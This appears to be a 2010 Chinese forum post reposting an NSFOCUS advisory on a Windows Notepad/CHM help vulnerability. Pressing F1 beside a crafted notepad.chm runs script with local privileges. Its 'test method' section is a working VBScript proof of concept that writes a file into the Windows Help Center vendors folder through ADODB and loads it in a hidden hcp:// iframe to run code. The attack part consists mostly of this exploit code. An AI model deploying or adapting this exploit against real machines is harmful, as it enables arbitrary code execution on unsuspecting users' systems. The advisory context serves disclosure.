- 在线时间
- 1369 小时
- 评分
- 980 分
- 飞币
- 627 元
- S币
- 3 元
- 最后登录
- 2012-5-21
- 注册时间
- 1970-1-1
- 帖子
- 1234
- 精华
- 4
- 积分
- 802
- 阅读权限
- 255
- UID
- 2
 
|
发表于 2010-3-17 17:24:36
|显示全部楼层
http://www.nsfocus.net/vulndb/14629
发布时间:2010-03-15
影响版本:
Microsoft Windows Server 2003
Microsoft Windows Server 2003 Server Pack 1
Microsoft Windows Server 2003 Server Pack 2
漏洞描述:写字板是Windows操作系统中附件所提供的简单文本编辑工具。如果相对路径为参数的话hhctrl.ocx控件的HtmlHelpA()函数就会打开当前目录中的CHM文件。攻击者可以诱骗用户打开与特制notepad.chm文件处于同一目录中的.txt文件,notepad.exe打开该文件后用户在文档中按下F1键获得帮助时就会以本地安全环境执行任意JavaScript代码。
经测试,该漏洞不仅适用于 Microsoft Windows XP SP3、Microsoft Windows 2000SP4,同样适用于Microsoft Windows Server 2003 的所有版本,Microsoft Windows XP 及 Microsoft Windows 2003 的其他版本有可能也存在该漏洞。
测试方法:- On Error Resume Next
- Set a = CreateObject("ADODB.Connection")
- b = ("Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=\\127.0.0.1\C$\;Persist Security Info=False;")
- a.Open b
- set rs =CreateObject("ADODB.Recordset")
- rs.Open "SELECT * from liscker.txt", a
- rs.Save "C:\windows\pchealth\helpctr\vendors\CN=Microsoft Corporation,L=Redmond,S=Washington,C=US\bugrep.htm"
- rs.close
- document.write "<iframe src=hcp://CN=Microsoft%20Corporation,L=Redmond,S=Washington,C=US/bugrep.htm height=0 width=0></iframe>"
|
|
